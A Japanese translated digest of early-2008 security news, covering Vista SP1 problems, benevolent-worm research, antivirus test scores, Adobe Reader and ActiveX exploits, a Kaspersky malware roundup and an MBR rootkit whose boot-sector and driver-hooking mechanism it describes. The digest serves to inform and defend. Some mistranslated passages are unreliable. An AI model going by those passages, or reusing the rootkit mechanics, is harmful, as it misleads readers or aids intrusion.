 サービスパックであるにも拘らず、Vistaは直前のバージョンであるWindows XPで生み出されたバックアップアーカイブを正しく操作できないでいる。ノートブックのバッテリ寿命に対する目に見える改善は無い。テストしたとき、一台のノートブックはWindows XPが起動するのと同じくらいの時間で半分起動しただけだった。更に8台のノートブックはc'tのテストで有意差無く起動しなかった。そこには幾つかの完全な新しい問題さえある。例えば、ウィルススキャナのような。Norton AntiVirusはエラーメッセージを発生させる。Bitdefenderはもはやインストールさえできない。

Vista SP1は幾つかのプログラムを損壊する。 Windows Tips & Tricks(2008/02/21)

 Vista SP1インストール後、特定のプログラムはもはや起動しない。あるいは、一部の機能が利用できない。MicrosoftはVista SP1で問題を起こす既知のプログラムリストを公開した。Microsoftはこれらのプログラムの多くは現在非互換を処理する新しいバージョンを持っていると示唆している。SP1をインストールする前、このリストをチェックし、問題を持つとされる全てのプログラムをアップデートしなさい。

Worm か Windows Updateなのか
heiseSecurity : News (2008/02/20)

 2003年半ばに戻る。そこにはNachiと呼ばれるワームがいた。NachiがMSBlasterとして知られるLovsanを追いかけ回す時、このワームはセキュリティホールを閉じた。Nachiはセキュリティホールを通ってWindowsシステムに入った。MSBlasterワームがシステム上に存在した場合は、これを削除し、次にRPCサービス中の穴を閉じるためにセキュリティパッチをインストールした。このワームは次に自身を他のシステムに拡散させることを企てた。
 明らかに、Microsoftは、このアイデアが大変役に立つと考えたので、そこの研究者達は以降このアプローチを真面目に調査した。Microsoftのセントラルサービスからのダウンロードが、この方法で配布されたなら、偉大なロードはサーバーの負荷を減量するだろう。さらにMicrosoftは、セキュリティアップデートがより急速に配布されると信じている。彼らの調査において、ケンブリッジをベースとする研究者は脆弱性あるシステムが、どれほど速くネットワーク中で同定されるかということの確認にとりわけ興味を持っている。Microsoftは、これら慈愛に満ちたワームが伝統的ワームより知的であると発言している。最初に、それらはランダムにLAN内で感染させられていないコンピュータを探す。そして、そこから他のシステムに浸透することを試みる。そのプロセスで、このワームは関連するIPアドレス空間付きのグループを発見しようとする。それが失敗したならば、他のアドレスレンジをいちかばちか試してみる。Microsoftの研究者はアメリカで4月に行われる、第27回コンピュータカンファレンスで彼らの発見をプレゼンすることを計画している。チームのメンバ、Milan Vojnovicは、オンラインでその幾許かについて公開している。
 しかし、少なくとも一人はMicrosoftのアイデアが役立たずであると考えている。 Bruce Schneier参照。彼はそのような良いものではなく、Microsoftに完全な恐怖のアプローチをせしめる悪いワームであると発言している。結局、どちらの場合もユーザには選択の余地は無い(慈悲深いワームでさえセキュリティホールを通じてシステムに入る)。しかし、ユーザがワームをアンインストールすることができるのなら、完全な繁殖メカニズムはもはや動作しない。SchneierはMicrosoftの現在の非能率的ソフトウェア配布システムの代わりを見つけようとしていることを仮定できるだけであると発言している。

以下も参照
Sampling Strategies for Epidemic-Style Information Dissemination, study by Milan Vojnovic et al.
Benevolent Worms, blog entry by Bruce Schneier.

AV-Test.org のアンチウィルス ソリューション テスト結果
AV-Test.org (2008/01/22)

テスト日時 : 2008/01/22
サンプル総数 : 1,024,381
テスト方法 : シグネチャベースの検出結果

WebWasher 1,023,742 99.9%
AVK 2008 1,022,418 99.8%
AntiVir 1,020,627 99.6%
Avast! 1,018,204 99.4%
Trend Micro 1,009,662 98.6%
Symantec 1,006,849 98.3%
AVG 1,005,006 98.1%
BitDefender 1,003,902 98.0%
Kaspersky 1,003,470 98.0%
Ikarus 1,002,894 97.9%
Sophos 1,001,655 97.8%
F-Secure 999,806 97.6%
Microsoft 992,880 96.9%
F-Prot 986,961 96.3%
Panda 979,409 95.6%
Rising 962,674 94.0%
Norman 962,191 93.9%
McAfee 959,919 93.7%
Fortinet 957,558 93.5%
NOD32 953,936 93.1%
Dr Web 887,736 86.7%
VBA32 885,313 86.4%
QuickHeal 862,919 84.2%
ClamAV 791,505 77.3%
Command 729,233 71.2%
VirusBuster 693,944 67.7%
K7 Computing 571,329 55.8%
eTrust-VET 566,161 55.3%

 【訳注】 下から二番目の K7 Computing は、ソースネクスト社のウィルスセキュリティのOEM元です。ウィルスセキュリティの検出力と考えて大過無いと考えます。

フィールド中に存在するAdobe Readerのもう一つの脆弱性
McAfee Avert Labs : Computer Security Research (2008/02/11)

 McAfee Avert Labsは、最近パッチされたAdobe Acrobat Reader中の脆弱性へのアクティブな攻撃を追跡していた。現在の脆弱性はPDF中に埋め込まれ、Adobe Javascriptを通じて巧みに取り扱われる。この様に悪意ある細工されたPDFファイルの最初の証拠は、彼のワークステーションの3台が感染させられていたことに気がついた注意深い管理者によるイタリアのメッセージフォーラムへの投稿であった。脆弱性への攻撃が成功すると、生贄のマシン上で実行されている埋め込まれたJavaScriptが導かれる。このスクリプトはオランダのIPアドレスからトロイの木馬をダウンロードしようとする。
 この脆弱性に対する攻撃はブラウザベースとE-Mail攻撃の両方で動作し、以下のAdobe製品に影響を与える。

    Adobe Reader 8.1.1 及び、それ以前のバージョン
    Adobe Acrobat Professional, 3D, Standard 8.1.1 及び、それ以前のバージョン

 この脆弱性を完全に軽減するには、Acrobat and Adobe Reader 7.x and 8.xを、Version 8.1.2にアップグレードする必要がある。
 マルウェアの作者は、PDF(Portable Document Format)がオンライン電子ドキュメントのデファクトスタンダードなので、とりわけ儲かるスピア フィッシング攻撃中に脆弱性攻撃の荷を積んだPDFを使用する技術を発見した。PDFファイルは伝統的にゲートウェイでフィルターされなかった。そして最近まで、Officeドキュメントに関する悪名高い歴史とは対照的に、リスクフリーと考えられてきた。
 しかしながら、Windows Vista と Microsoft Office 2007のリリースで、Microsoftはバッファオーバーフローの脆弱性を使用した攻撃をより困難なものにした。これで、我々は脆弱性を攻撃するライターの仕事が、より簡単な仕事をターゲットになるだろうと予測していた。Adobe, Apple, RealPlayerからの人気あるアプリケーションの脆弱性を攻撃することは、悪意ある者にとって、まさに有利・有益であると判明している。
 我々はAdobe Reader と Acrobatの脆弱性あるバージョンを稼働しているユーザに対して、それらをAdobeのサイトからアップデートするよう強くアドバイスする。McAfeeユーザは、本日の5227 DATリリース(そのようなものを、Exploit-PDF.bとして検出する)で、この様な細工されたPDFファイルから防御される。

Vista SP1 でトラブル
Windows Tips & Tricks : News (2008/02/07)

 MicrosoftはVista SP1をリリースしたかもしれないが、未だ問題が残ったままである。George Ouのような専門家でさえ、此処に記しているように問題を発生させている。我々大多数は、そのようなことが解決されるまで、SP1をインストールすることなど考えるべきではない。彼が記していることは以下である。

     私は昨晩まず、メインのデスクトップコンピュータと、新しい仕事用コンピュータである私の最初のVistaラップトップコンピュータにVista SP1 RTMアップグレードの二つのインストレーションを完了させた。その結果、私のデスクトップコンピュータはほぼ死亡状態となった。そして、ラップトップは本当に死んだ。

 【訳注】情報がかなりアップデートされています。ZDNet上のオリジナルサイト(上記リンク)参照ください。
 【訳注】MicrosoftはVista SP1のリリースを延期したようです。ドライバ関係の動作が保証できないというのが理由のようです。
こちらのリンク参照してください

Adobe,Appleセキュリティアップデートをリリース
WashingtonPost : Security Fix (2008/02/06)

 AdobeはフリーのAdobe Readerの2ダース以上のバグ(幾つかのセキュリティホールを含む)を修正したアップデートをリリースした。Appleもまた今週iPhoneアプリケーション中の一つのセキュリティ脆弱性を塞ぐパッチを公開した。
 Adobe Reader 8.1.2は、Windows,Mac,Linux,Solarisシステムで利用可能である。Adobeは此処に簡単な概要を示した以外、この変更に関するいかなる情報も公開していない。最新バージョンはこちらから(日本語ページにリンクを変更)利用可能である。
 Adobe ReaderのWindowsユーザへの注意 : 以前チェックされたボックスのチェックを外さなければ、Photoshopアルバム スタータ エディションもダウンロードされる。これらのアドオンのために、一般的にブロートしReaderでPDFドキュメントをオープンするときに時間がかかるのが、随分以前に私がAdobe ReaderからFoxit Readerに切り替えた理由である。Foxitはとても軽く、PDFドキュメントを即座に開くことができる。
 AppleのアップデートはiPhoto中の一つの脆弱性を修正した。AppleはMacユーザが悪意で細工されたPhotocastに登録したなら、そのPhotocastの所有者はユーザのマシンへのアクセスを獲得し、ソフトウェアのインストールができることを発見した。通常通り、アップデートは備え付けのSoftware Update経由で、もしくはApple Downloadから入手できる。

ActiveXコントロール脆弱性
eWeek.com : Security (2008/02/04)

 US-CERTは、広範に公開された未パッチのソフトウェアの脆弱性通報に対する防御のために、IEのActiveXコントロールを即座に無効化するようWebサーファを駆り立てている。
 US-CERTが推薦していることは、FacebookとMySpaceによって使用されている画像アップローダ中の複数の0-dayのフローとYahooミュージック ジュークボックス ソフトウェア付きで出荷されたActiveXコントロール中の複数のバグに関する脆弱性を攻撃するコードがリリースされたことによる。
 Milw0rm.com Webサイトに投稿されたこの脆弱性は、Windowsコンピュータに対して完全なリモートコード実行攻撃用のロードマップを提供している。
 ActiveXコントロールは、アニメーション表示用に、あるいは、スプレッドシートやツールバーのようなアイテムを含むためにUI関数を拡張するために、Windows Web アプリケーションで汎用的に使用される。しかし、このテクノロジは深刻な脆弱性と問題の発生により、穴埋めされつづけてきた。
 Will Dormann(この数年ActiveXのセキュリティに警鐘を鳴らし続けてきたセキュリティ研究者)によれば、Webブラウザ中でActiveXを使用することは、システムの攻撃対象領域あるいは「攻撃可能性」をとてつもなく増加させる。
 その理由は、例えそのオブジェクトがWebブラウザ中で使用されるように設計されていなくとも、脆弱性あるActiveXオブジェクトはIE経由で攻撃される可能性がある。これはドライブ-バイ ダウンロードのための最も重要なターゲットであると、セキュリティ研究者は発言している。
**************************** 以下略

Firefoxに未パッチの深刻な脆弱性
ZDNet : Security (2008/01/30)

 MozillaセキュリティのチーフWindow Snyderによれば、MozillaはFirefoxの極めて深刻と評価される脆弱性(アタッカーはクッキーや履歴のようなセション情報を収集できる)についての"proof of concept"を公開した。
 Synderは前倒しされるFirefox 2.0.0.12でパッチされるだろうと、発言している。
 1月22日、Snyderは1月19日研究者Gerry Eisenhaurによって発見された脆弱性のproof of conceptを確認した。簡潔に言えば、Firefoxはアタッカーがマシン上にあらゆるJavaScriptファイルをロードできる情報をリークする。この“chrome protocol directory transveral”は、汎用されているアドオンの"flat"ファイルがインストールされている場合に常時動作している。大多数のFirefoxユーザが少なくともこれらアドオンの幾許かをインストールしている可能性は十分にある。それらは多くのデータ流出をもたらす。Mozillaは当初このフローに低レベルの危険性評価をしたが、更なる調査によって評価を変更した。
 Snyderの記述

    アタッカーはこの脆弱性を使用してセッション クッキーやセッション ヒストリを含むセッション情報を収集することができる。FirefoxはDefaultで脆弱性を持っていない。あなたが、これらアドオンの製作者であれば、.jarパッケージを使用するアドオンをどうかアップデートしてください。

 影響されるアドオンのリストは長大であるが、Snyderは部分的な表だと注意をしている。

マルウェア小論 12月度
Kaspersky : Lab Weblog (2008/01/22)

1. 銀行をターゲットにした貪欲なトロイの木馬
 このタイトルの12月の勝者は、Trojan.Win32.Qhost.sxである。このトロイは42の銀行の顧客をターゲットにしていた。

2. eペイメント(電子決済)システムをターゲットにした貪欲なトロイの木馬
 Trojan-Spy.Win32.Banker.bdnが一度に三つの電子決済システム上に目標を設定する。

3. プラスチックカードをターゲットにした貪欲なトロイの木馬
 このカテゴリの12月の勝者はTrojan-Spy.Win32.Banbra.vfであった。

4. 最高位ステルスプログラム
 Backdoor.Win32.Hupigon.rcが11の異なったパっカーでパックされていた。12月のステルスプログラムのタイトルを勝ち得た。

5. 最も小さな悪意あるプログラム
 Trojan.BAT.KillFiles.gmが冬の始めの月におけるこのカテゴリのリーダーとなった。たった、12バイト。でも、C:ドライブを綺麗に掃除することができる。

6. 最も巨大な悪意あるプログラム
   12月の最も大きな悪意あるプログラムはたいして大きなものではなかった。最終的に、Backdoor.Win32.Bifrose.adrで僅か82MB。いままでのこのカテゴリの勝者に比べ明らかに小さい。

7. 最も悪意あるプログラム
   12月の最も悪意あるプログラム(Backdoor.Win32.Hupigon.vqe)は、メモリ、ハードドライブ、そしてレジストリからセキュリティソフトウェアを削除する。

8. E-Mailトラフィックに最も汎用された悪意あるプログラム
 また再び、古参のEmail-Worm.Win32.Netsky.qが、このカテゴリを勝利した。12月のメールトラフィック中の全悪意あるコードの20.03%を占めた。

9. 最も汎用されたトロイの木馬ファミリー
   Backdoor.Win32.Rbotが673で先月のこのタイトルを取得した。

10. 最も汎用されたウィルス/ワーム ファミリー
   別の再犯者、Email-Worm.Win32.Zhelatinがトップに復帰した。69の変種で12月のこのタイトルを勝利した。

セキュリティの修正を含む巨大なJavaアップデート
WashingtonPost : Security Fix (2008/01/23)

Sunは、およそ370ものバグフィックスをもたらすJavaソフトウェアに対する別のアップデート(数多くのセキュリティフィックスを含む)をリリースした。
 大多数のホームユーザのために、このアップデートはJava 6 Update4をこのソフトウェアの最新バージョンにする。多くのWindowsユーザは彼らのシステム上にJavaのいくつかのバージョンを持っている。そして、そこにはシステムに進入するために古いセキュリティホールの脆弱性を突くマルウェアのサンプルが溢れているので、あなたがJavaを使用したことを決して思い出せない場合でさえ、このソフトウェアにパッチを充てることは得策である。
 このアップデートはWindows、Linux、Solarisシステムで利用可能である。リンクはコチラから。 インストールされているJavaを確認するためには、Windowsのコントロールパネルから「プログラムの追加と削除」のリストをチェックする。SunはこのプログラムをJava SE Runtime Environment 6と呼ぶが、Windowsの「プログラムの追加と削除」リストではJava(TM) 6)として表示される。あなたはSunのJavaホームページを訪問する。そして、そのトップで"Do I have Java"をクリックし、"Verify Installation"ボタンをクリックしても良い。私がJava 6 Update 3をインストールしてあるマシンでこの操作を実行したとき、このページは最新バージョンがインストールされたとして、私に祝福のメッセージを表示した。
 あなたがホームユーザであり、この最新更新以前の古いバージョン(Windowsユーザは多分複数のJavaバージョンをインストールしているだろう。インストーラが以前のバージョンを削除しないので)をインストールしているのであれば、このアップデートをインストールした後、それらを削除しなさい。

Trend MicroがBot detector(ベータ) をリリース
heise Security : News (2008/01/17)

 Trend Microは"Bot detector"(ボット検出器)を開発し、フリーのダウンロード用ベータ バージョンを提供している。RUBottedはバックグラウンドで稼働し、コンピュータのネットワーク活動を監視する。


    ZoomMicros RUBottedはコンピュータ上でアクティブなBotを検出することを前提としている。

 コンピュータをゾンビ化し、Botネットワークの一部に組み込む汚染物は、コントロールサーバとコミュニケートしなければならない。そして通常、膨大な数のスパムメールを送信する。そこで、RUBottedは、そのコンピュータのIRC(インターネット・リレー・チャット)を呼び出すアウトゴーイング、インカミングHTTPリクエスト、アウトゴーイングE-Mailをチェックする。そして、ネット名を解決するためのDNS要求を監視する。


    RUBottedは、そこに疑わしい行動があるとき警告を発し、そのコンピュータをオンライン ウィルス スキャナ でチェックするよう示唆する。

 RUBottedが発見したとき、それは小さな警告ウィンドウをを開き、悪意ある攻撃に関し、そのコンピュータをチェックするためにTrend MicroのHouseCall(トレンドマイクロのオンライン・ウィルス・スキャナ)を稼働するよう通知する。Windows XPコンピュータ上のストームワームの変種群を使用したheise Securityによる簡単なテストでは、この物は完全に検出された。Trend MicroはRUBottedがコンピュータ上にインストールされているアンチウィルスソフトウェア(他のメーカの製品でさえ)と結合して稼働するよう意図されていると発言している。このプログラムはWindows 2000, XP, Server 2003 と 32-bit Vista上で稼働するよう設計されている。

【訳注】http://www.trendsecure.com/portal-US/tools/で、左ペインのRUBotterを選択。

AppleがQuickTime, iPhone, iPodのセキュリティホールのパッチをリリース
WashingtonPost : Security Fix (2008/01/17)

 Appleは、iPhone, iPod touch と QuickTime メディアプレイヤー中の数々のセキュリティホールを塞ぐパッチをリリースした。
 QuickTimeのアップデートは、Mac OS X(Leopard, OS X 10.5を含む)と、そのソフトウェアのWindowsバージョン共に発見された少なくとも四つのセキュリティフローを修正した。Windowsユーザは、 バンドルされているApple Software Updateアプリケーションを使用するか、もしくはAppleダウンロードから最新バージョンを入手できる。Macユーザは備え付けのSoftware Updateを使用してアップデートを入手できる。
 iPhone/iPod touchのアップデートは両方のデバイス中に存在する三つの脆弱性を修正している。このアップデートはiTuneを通してのみインストールできる。アップデートがこれらデバイスに利用可能になったとき、自動的にユーザに忠告するようになっている。詳細に関してはAppleのセキュリティ アドバイザリを参照。

MS-Exelに既に攻撃の始まっている深刻な脆弱性が存在
heise Security : News (2008/01/16)

 MicrosoftはExelスプレッドシート アプリケーション 中にセキュリティ上の脆弱性が存在するとするセキュリティ アドバイザリをリリースした。そして、悪意あるコードを稼働することで攻撃者は功績をあげることができる。セキュリティ アドバイザリによれば、この攻撃は既に悪意ある者によって功績をあげられている。
このバグは、Microsoft Office の Excel 2003 Service Pack 2, Excel Viewer 2003, Excel 2002, Excel 2000 と Microsoft Excel 2004(Mac版)に影響する。Microsoftはこの脆弱性に関し如何なる詳細もリリースしていない。しかしながら、Excel 2007, Excel 2008(Mac版)と Excel 2003 Service Pack 3 には、明らかにこの脆弱性は存在しない。
以前のバージョンのExcel利用者は、Microsoft Office Isolated Conversion Environment (MOICE)を使用することによって自身を守るべきである。そのようにするためには、ユーザは利用可能な全てのOfficeアップデートと、Office2007ファイルフォーマット互換パックをインストールしなければならない。
MOISはWindows Updateのサイトから利用可能である。インストールの後、ExelファイルはMOISに関連付けされる必要がある。これは、コマンドラインから以下のコマンドを実行する。

    ASSOC .XLS=oice.excel.sheet
    ASSOC .XLT=oice.excel.template
    ASSOC .XLA=oice.excel.addin.
    【訳注】各行末尾で[ENTER]キーを押してください。

これでMOICSEは開いたときにEXCELファイルをOffice2007フォーマットに変換し、危険なコードの怖れのある全ての物をフィルターする。以前のバージョンのOfficeユーザは互換パックをインストールすることで変換されたファイルを開くことができるが、Office2003あるいはOffice2007がインストールされていなければファイルを変換することはできないだろう。
Microsoft セキュリティ アドバイザリによれば、巧妙に細工されたOfficeドキュメントを使用した攻撃は現在実行されている。この種の攻撃は、とりわけ会社経営と取締役会のメンバに関して、既に昨年確認されている。Microsoft開発チームは、未だ脆弱性の中にある。そして、脆弱性の修正がリリースされる時期は知られていない。

【訳注】
この問題に関するMicrosoftの説明サイトは以下です。 http://go.microsoft.com/?linkid=8103854

ブートセクタ ウィルスの回帰
heise Security : News (2008/01/09)

アンチルートキット プログラムGMERの開発者達はハードドライブのマスター ブート レコード(MBR)をそれ自身の棲家とし、Windowsシステム上で自身を隠蔽するためにルートキット テクニックを使用している汚染物を発見した。セキュリティ サービス プロバイダ Prevxの研究者達はマルウェアを注入するために既にサポートされなくなっているソフトウェアのセキュリティホールを突かれた数々のWebサイトの一部にMBR汚染物を発見した。 未だ名前の付けられていないMBRルートキットはBootRoot(セキュリティ プロバイダeEyeによって行われた実行可能性調査)用の自由に利用できるコードを基にしている。2005年のBlack Hatカンファレンスで、eEyeの研究者はMBR中にそれ自身を埋め込む汚染方法(システムをブートしたときドライバを巧みに取り扱うことで)についてデモした。それはWindowsNTとその後継バージョンに感染することが可能である。
GMERのレポートによれば、最近検出された汚染物は、MBRにそれ自身をコピーする前に、オリジナルのブートセクタをセクタ62にコピーする。そして、セクタ60,61に追加データを書き込む。汚染物はルートキット ドライバをフリーセクタ(通常ドライブの最後のセクタ)に書き込む。そこで、MBR中のコードはルートキット ドライバがロードされることを確実にしている。
システムを再起動したとき、そのコードフックはロードされたデータの制御権を取得するため13hを遮断する(【訳注】通常のC:ドライブのMBRの読み込みを遮断するという意味)。コードフックは次にWindowsカーネルをフックし、それにパッチを充てるのでコードフックはルートキット ドライバをロードする。このルートキット ドライバは、それ自身でドライバ disk.sys のシステム機能 IPR_MJ_READ と IPR_MJ_WRITE をフックする。そして、セクタ62中のオリジナル コードに対しブートセクタ読み込みの要求をリダイレクトする。さらに、このルートキット ドライバはインターネット接続をセットアップする。
MBRルートキットは若干の制限の付いたWindows Vista上でも稼働する。例えば、User Account Controllが埋め込まれていれば、MBRルートキットは、その足場を得ることはできない。さらに、パッチするためにVistaカーネルの一部を探すが、このコードは世評によれば上手くいかない。けれども、Windows XP上ではスムーズに稼働するといわれている。
このルートキットはクロスリファレンス(ブートセクタが読み込まれた後のWindows関数の結果と、Windows関数を使用せず直接アクセスして得た結果とを比較する)を用いることで発見された。このルートキットの削除はいたって簡単である。Windowsのツール fixmbr で悪意あるコードを上書きすることで解決する。
DOSの時代に立ち戻れば、ブートセクタ ウィルスは珍しい物ではなかった。Windows NTとりわけWindows XPのリリース以降、このようなウィルスは個人ユーザにとってより重要なものではなくなった。古いMBR汚染物は、一般的な現在主流のOSには影響を与えない。しかし、最近発見された主としてイタリアのWebサイトを改竄したMBRルートキットは新しいレベルのリスクを与えた。アンチウィルス ベンダ各社は今、その検出メカニズムと処置方法を開発するため刻苦勉励している。

F-Secure Helth Checkというオンラインツールをリリース
F-Secure Weblog : News from the Lab (2008/01/08)

 あなたはWindows OSを最新の状態に保つために単純にMicrosoft Updateを実行する。FirefoxのようなWebブラウザもまた定期的にアップデートを表示する。
 しかし、あなたが所有する他のアプリケーションはどうだろうか。
 このWebログの常連は我々が過去に投稿したSecurity Advisoriesを思い出すかもしれない。たとえば、昨年の10月22日、11月7日、12月10日である。
 我々はまた5週間前に投票を実行した。

 この結果は、多くの人々がサードパーティー製アプリケーションのアップデートが伴っている時、彼らのコンピュータが完全にパッチされているか否か不確実であることを露にした。
 (質問): このことに関して、あなたは何を実行しますか?
 (回答): F-Secure Health Check
 Health Checkはフリーのオンラインツールであり、利用者のコンピュータ上で必要なセキュリティ アップデートを支援するようデザインされている。
 Health Checkは現在IEでのみ稼動する。他のブラウザについては追い追いそれらに対する機能を追加するだろう。

 【訳注】: この図は単なる画像ではありません。イメージマップを設定しています。図中の"Check Now"をクリックすればF-Secure Health CheckのTopページにジャンプします。また、Official Launch PageのリンクをクリックしてもF-Secure Health CheckのTopページにジャンプします。
 Click Here to launch・・・・・・のhereのリンクをクリックすれば、直接F-Secure Health Checkの実行ページにジャンプします。

 公式の起動ページは此方である。http://www.f-secure.com/healthcheck/  直接行きたい方は、このリンクをクリック。

【訳者の感想】
     今のところSecuniaのSoftware Inspectorの方が、軽いし速い。登録さえしておけばデータベースのアップデートが行われたときメールで通知してくれる。また、仮想環境でも問題なく実行できる。
     これに比べ、F-Secure Health Check定義ファイルのアップデート等にかなり時間がかかるし、チェックしている時間も長い。数が多いという訳でもない様に思う。なお、仮想環境ではレポートの作成に失敗した。IE7の設定の問題かもしれないが・・・・・・。
     RC-1ではあるが、オンラインセキュリティに関するソフトウェアの更新を知りたいのであればSecunia PSIというインストールして使うソフトがある。

AdAware SE Personal の定義ファイルの更新が停止された
WashingtonPost : Security Fix (2008/01/07)

Ad-Aware SE PersonalのFreeバージョンをスパイウェアやアドウェアからマシンを守るために使用しているMicrosoft Windowsユーザは、メーカーのLavasoftが昨年末の12月31日に、このソフトウェア用の定義ファイルの更新の配布を停止したことに注意しなければならない。
Ad-Awareの使用を継続したい人々は、Ad-Aware 2007にアップグレードできる。このプログラムのフリー バージョンはここから利用可能である(新バージョンのインストーラは以前のAd-Awareバージョン自動的にを削除する)。Lavasoftのフォーラム に投稿された説明によれば、Ad-Aware Plus and Professionalのユーザは未だ定義ファイルのアップデートを取得することは可能である。
Ad-Aware 2007 は幾つかの重要な変更が含まれている。注意すべきはWindows 2000以前のOSはサポートされなくなったことである。また、Windowsの常駐サービスとしてAd-Aware 2007を起動する。私の印象は、大多数のAd-Awareユーザは如何なる種類のリアルタイムスキャンよりむしろ、このプログラムをオンデマンドスキャンとして使用していると思っていたので、この現象は私には奇妙な決定として写った。いずれにせよ、Lavasoftはこの変更の説明をここで行っている
私自身、この2年間程アンチスパイウェアを使用していないこともあり、この新バージョンを試している読者の意見を聞くことに興味を持った。私は毎日の使用ではLimited UserアカウントでWindowsシステムを起動する。経験上この手法はアドウェアやスパイウェアの大多数を撲滅する。
Limited Userアカウントでの処理に多くの苦痛を感じる(幾つかのアプリケーションは、幾つかの重要な設定変更をしない限り、制限付きユーザアカウントではまともに稼働しない)人々のために、DropMyRightsは同様の機能をより少ない制限で解決してくれる。あなたを助けるこのプログラムは、あなたが最も汎用するアプリケーションにセットアップするので、システム設定の変更やオンライン アプリケーションのインストールのための通り道として使用することはできない。

Omnitureとは何か? そして、それは何故私を監視するのか?
The Guardian Unlimited : Technology news & features(2008/01/03)

Omniture、それは使用状況追跡サイトである。あなたが AdobeやAppleのiTunes Ministoreのアプリケーションの使用状況を望まないのなら、追跡されることは心配なことである。Adobe Creative Suite 3 (CS3)を開始したとき、それがユーザのネットワーク上のIPアドレスのように見える、192.168.112.2O7.netにコンタクトしようとすることに、あるブロガー(tinyurl.com/34oxm8)が気がついたため、Omunitureは不本意にもスポットライトを浴びることになった。

Omunitureは疑いなく、あなたのマシン上で同一の(合法的に入手したものと)ソフトウェアを複数起動していないかを確認するために、あなたのローカルネットワークをチェックする、違いますか? Microsoft Officeも実行している。

192.168.112.2O7の末尾の"0"はゼロではなく大文字のO(アルファベットのオー)である。IPアドレスはサフィックスを持っていない。どうなっているのか? Omuniture。これは何なのか? はっきりいえば、それはOmuniture(巨大なWeb利用状況追跡会社)が所有する2o7.netにコンタクトする。では、何故OmunitureはローカルなIPのように見える物の後ろに同定していることを隠蔽していたのか?

John Nack(Adobe Photoshopの責任者)は不正使用している者を迅速に退けるためで、幾つかのAdobe製品のWelcome Screenからの、Adobe Bridge(Operaブラウザに組み込まれているバージョンを含む)と、ユーザがHelpメニュー経由でそれらを要求した場合に「様々なAdobeオンラインリソース」からの、入力トラフィックを記録するためにだけ使用されると主張している(tinyurl.com/2fes7r上で)。しかし、そこで彼は人々が、欺くかの如きサーバ名に苛立っているようだということに気がついた(tinyurl.com/ysudps)。何故それを"adobestats.omniture.com"としなかったのか? Nackは「残念なことに私はその答を知らない。。。。 私は隣の奴以外に私の背後を彷徨くことを欲しない 」と応答している。

これは、何故その接続がomniture.comのようなサーバに作成されていることをより明らかにしないのか、そしてそれが、何が起こっているのかということを全ての者に明らかにせしめるだろう、という質問の答になっていない。しかしながら、Omunitureは何故そうしたのかという説明を行った(tinyurl.com/ys8lob)。"Omniture Acts on Behalf of our Customers" (sic)のようなヘッドラインを使用することは、あなたや私がその(Adobeのような会社の)顧客であることを明らかにする。「Omunitureは明瞭にそして公正に顧客によってそうすることを指示されない限り、あらゆるサードパーティーのそのような情報を顕にしない」という契約は、単なるサーファーには意味をなさない。もしもOmunitureがあなたが実行していることを見ているのであれば、あなたは顧客の一人ではない。あなたはまさに、あなたがどの様なアプリケーションを、何時、如何なるインターネット ロケーションから起動したかというよな情報を提供するデータポイントである。

Omunitureはこのように、昨年重要性を増した問題の別の側面を我々に与えた。我々の膨大なプライバシーは我々の同意なしに侵略されている。もしも、FacebookがBeaconと共にそれを実行し、AdobeとAppleがOmunitureと共にそれを実行しているのなら、他には誰がそれを実行しているのだろうか?

それと同時に、そのような出力側インターネット クエリーをチェックし続けよう。あなたが次のインターネット ファイアーストームを作りだすかもしれないということは、あなたには決して分からないのだから。

発生中のトラブルのまとめ
(2008/01/04)

 いったい何があったのかと疑いたくなるほど、トラブルが頻発している。そのまとめ。

1/ Firefox v2.0.0.11にスプーフィングの脆弱性

     この問題はイスラエルのセキュリティ研究者Aviv Raffによって発見された。詳細は以下。
     http://aviv.raffon.net/2008/01/02/YetAnotherDialogSpoofingFirefoxBasicAuthentication.aspx
     Mozillaは現在調査中としている。

2/ McAfee誤った定義ファイルを配布

     SANSによると、McAfeeが誤った定義ファイルを配布(一月二日にリリースされた、DAT 5197)したため、結果としてMcAfeeユーザはESPNとFriendsterを含むサイトを訪問した場合、Exploit-BO JavaScriptウィルスに感染したと警告される。
    解決方法は最新の定義ファイルにアップデートし直すこと。

3/ ClamAVに脆弱性

     ClamAVアンチウィルス(v0.92)にファイルの操作とスキャンにおいて、バイパスされる脆弱性が発見されている。他のバージョンも影響を受けるものと推測されている。
     現時点で、ベンダーからのパッチはリリースされていない。

4/ Office2003 SP3で古いファイルフォーマットがサポートされない

     (【訳注】これはアップデートするときに表示されるかもしれませんが)Office2003にSP3を適用した場合、Word, Excel, 1-2-3, Quattro, Corel Drawで作成したドキュメントはサポートされなくなる。Microsoftサポートセンターによると、「defaultでこれらのファイルフォーマットはブロックされる。これは、そのようなファイルの安全性が低いためである。これらのファイルはあなたにリスクを引き起こすかもしれない」

     【訳者】いらざるお節介。

Real Playerに深刻な脆弱性
Channel Register : Security (2008/01/03)

 RealPlayer 11 (6.0.14.748)中のフローは、このソフトウェアを稼動しているWindows上で悪意あるコードを注入するために使用されると、セキュリティ企業Secuniaが警告している。RealPlayerの他のバージョンもまた脆弱性があるかもしれない。
 RealPlayer 11 のオーバーフローバグを突く攻撃はロシアのセキュリティ企業Glegによって発見された。この会社はRealPlayerのソースコードを調査している時にこの脆弱性を発見した。Glegは、パッチのリリース待ちをしているため、このフローに関する技術的な詳細を公開していないが、脆弱性に関するフラッシュのデモをココにポストしている。
 セキュュリティ情報センターUS CERTは、脆弱性の証明公開後、危険性を高めたアドバイザリをリリースした。SCマガジンの追加情報によれば、RealNetworksはこのフローを調査中である。デベロッパは、最初にこのバグを修正するチャンスを与えることなく脆弱性の証明を公開したGlegを非難していた。
 人気のあるメディアプレイヤー(【訳注】RealPlayerのこと)のユーザは、このフローの結果として所有するシステムに対するリスクを最小化するために、信頼されていないメディアファイル(とりわけ、信頼されていないサイトで見つけた物)を開かないようにアドバイスされている。